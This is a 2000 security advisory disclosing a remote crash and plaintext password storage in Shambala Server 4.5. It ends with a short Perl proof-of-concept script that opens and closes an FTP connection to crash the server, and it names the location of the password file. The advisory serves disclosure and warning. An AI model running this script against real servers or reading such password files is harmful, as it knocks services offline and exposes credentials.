|
Home : Advisories : DoS in Shambala Server
Title: |
DoS in Shambala Server |
Released by: |
zillion |
Date: |
9th October 2000 |
Printable version: |
Click here |
***************************************************************************************
* Subject: DoS in Shambala Server 4.5 *
* Platforms: Microsoft Windows 9x, WIndows NT and Windows 2000 *
* Risk Level High *
* Author: zillion *
* Vendor: Evolvable Corporation *
* Vendor status: Notified 4 weeks ago. The problem will be fixed in a next release *
***************************************************************************************
Subject:
=========
Shambala Server 4.5 denial of service attack.
Overview:
==========
Shambala is a low cost, multi-featured FTP and Web server distributed by
Evolvable Corporation. It is used by numerous amateur and small office/home
webmasters as an economical way to launch and manage a website.
A problem with Shambala's mishandling of connections and disconnections would
potentially enable a (simple) denial-of-service attack. A second observation
is Shambala's storage of passwords in-the-clear on the server: a major problem
on Windows 95 and 98 platforms.
Product details:
=================
Vendor's blurb: "Shambala is an easy to use communications server
featuring the ability to serve and access web sites, ftp sites, and
chat rooms. Using Shambala, you can quickly create a web site and host
it from any PC. Shambala doesn't require NT and its installation is
non-invasive."
Technical description:
======================
Shambala does not handle all connections correctly. It is therefore
possible to remotely crash the ftp server using a custom script which
automates the action of opening and closing a connection to and from the
server. The server crashes upon disconnection and gives the following error:
Run-time error `20127`
invalid ConnectionID
A second problem is that Shambala stores all passwords in plain text on the server:
c:\program files\shambala\passwords.txt (in our case)
This is not such a big deal on an NT server as permissions could be set to deny access to this
file. Because the server is also shipped for Windows 95 and Windows 98 it could be possible for
any user to gain access to the file.
Recommendations:
================
It is recommended to disable the daemon until a fixed package is released.
Vendor links:
==========
http://www.evolvable.com/
http://www.evolvable.com/estore/product.asp?sku=1
Contact info:
=============
Shambala creator: awacker@evolvable.com
Bug founder:zillion@safemode.org
http://www.safemode.org
Greets:
========
Shoutz to #hackerzlair Edgemaster, The_Wizz (pintje?), Munge, Acos, Dirk, RFP, George and all the s-mode members (what's left of it ;).
---cut-here---
#!/usr/bin/perl
#
# This tool (tool not exploit!) crashes shambale server 4.5
# This is a stripped version of Guido Bakkers exploit code (bedankt)
#
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
&usage if !defined($args{s});
$serv = $args{s};
$EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print "Done...\n";
exit; # remove this and the server will *NOT* crash
sub usage {die("\n$0 -s ipaddress\n\n");}
---cut-here---
***********************************************************************************
This advisory was created by zillion (at) safemode.org with the aim of promoting
secure computing and to warn users of potential holes in networks and systems.
Safemode is not responsible for any malicious, illegal or otherwise antisocial action
taken with the information revealed in this advisory. Permission is granted for
copying and circulating this advisory to the Internet community for the purpose
of alerting them to problems, if and only if, the advisory is not edited or changed
in any way, and is attributed to Safemode. (with other words: don't blame me ;)
***********************************************************************************
|